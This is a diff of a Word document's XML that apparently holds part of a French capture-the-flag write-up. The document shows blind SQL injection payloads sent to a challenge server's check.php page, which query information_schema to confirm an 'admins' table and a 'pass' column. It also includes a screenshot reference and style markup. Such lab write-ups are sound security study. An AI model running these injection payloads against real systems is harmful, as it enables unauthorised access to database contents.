+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>%27pass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>%27) --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>colonne</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> existante </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>pass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId17" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="fr-FR"/>
+          </w:rPr>
+          <w:t>http://chall.bunkerity.com:8002/check.php?id=3</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>fro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>information_schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>where</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = %27vuln%27 and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = %27admins%27) and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  (select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>column_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>information_schema.columns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>where</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>column_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = %27pass%27) --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA758A0" wp14:editId="03FDC5F0">
+            <wp:extent cx="5760720" cy="1931035"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="9" name="Image 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1931035"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
@@ -564,11 +2729,31 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="008D0F6E"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Titre3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="Titre3Car"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="0065298F"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
@@ -591,6 +2776,62 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
+    <w:name w:val="Titre 3 Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="Titre3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="0065298F"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="qu">
+    <w:name w:val="qu"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="0065298F"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="gd">
+    <w:name w:val="gd"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="0065298F"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="go">
+    <w:name w:val="go"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="0065298F"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="g3">
+    <w:name w:val="g3"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="0065298F"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="hb">
+    <w:name w:val="hb"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="0065298F"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="g2">
+    <w:name w:val="g2"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="0065298F"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="Lienhypertexte">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="0065298F"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
